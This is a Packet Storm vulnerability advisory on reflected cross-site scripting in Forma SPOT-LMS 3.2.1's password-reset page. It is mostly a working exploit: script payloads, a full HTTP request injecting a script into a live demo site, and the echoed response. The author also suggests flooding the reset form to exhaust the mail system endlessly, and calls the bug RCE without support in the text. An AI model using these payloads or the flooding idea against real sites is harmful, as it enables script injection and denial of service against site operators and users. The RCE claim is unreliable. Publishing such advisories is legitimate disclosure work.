Lucene search

K
packetstormNu11secur1tyPACKETSTORM:169734
HistoryNov 08, 2022 - 12:00 a.m.

Forma SPOT-LMS 3.2.1 Cross Site Scripting

2022-11-0800:00:00
nu11secur1ty
packetstormsecurity.com
174
`## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) RCE - reset mail vulnerability  
## Author: nu11secur1ty  
## Date: 11.07.2022  
## Vendor: https://www.spotlms.us/index_multi.php  
## The software is applied in the demo account:  
https://www.spotlms-anca-001.ovh/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest  
  
## Description:  
The name of an arbitrarily supplied `URL` parameter from forgetpw.php  
is copied into the value of an HTML tag attribute which is  
encapsulated in double quotation marks.  
The payload qnlxv"><script>alert('hello from  
nu11secur1ty')</script>sad4r was submitted in the name of an  
arbitrarily supplied URL parameter.  
This input was echoed unmodified in the application's response.  
The attacker can use this vulnerability to crash the cloud system by  
sending an unlimited password reset request to mail in an already  
created account on some domain, for example:  
(www.spotlms-anca-001.ovh).  
  
## NOTE:  
For this test `google` reacted on the twentieth request =) and they  
block the requests from my exploit, but after some time the attacker  
can repeat and repeat these steps endlessly :)  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploit:  
  
```POST  
GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img  
src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>");  
}; window.onload = a; alert("A Hidden scripted image, warning you are  
vulnerable!");</script>sad4r HTTP/2  
Host: www.spotlms-anca-001.ovh  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63  
Safari/537.36  
Cache-Control: max-age=0  
Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809;  
_ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793;  
_gat=1  
Upgrade-Insecure-Requests: 1  
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-Ch-Ua-Platform: Windows  
Sec-Ch-Ua-Mobile: ?0  
Content-Length: 0  
```  
[+]Responce:  
  
```  
pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');  
//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"  
src="/images/logos/logo-aurorae-v0.png" width="176" height="65"  
data-pagespeed-url-hash="3925108827"  
onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>  
<center>  
<p class="mt-3">A validation code will be sent to  
your email to authorize the password reset operation</p>  
</center>  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)  
  
## Proof and Exploit:  
[href](https://streamable.com/y4gz1n)  
  
## Time spent  
`1:45`  
`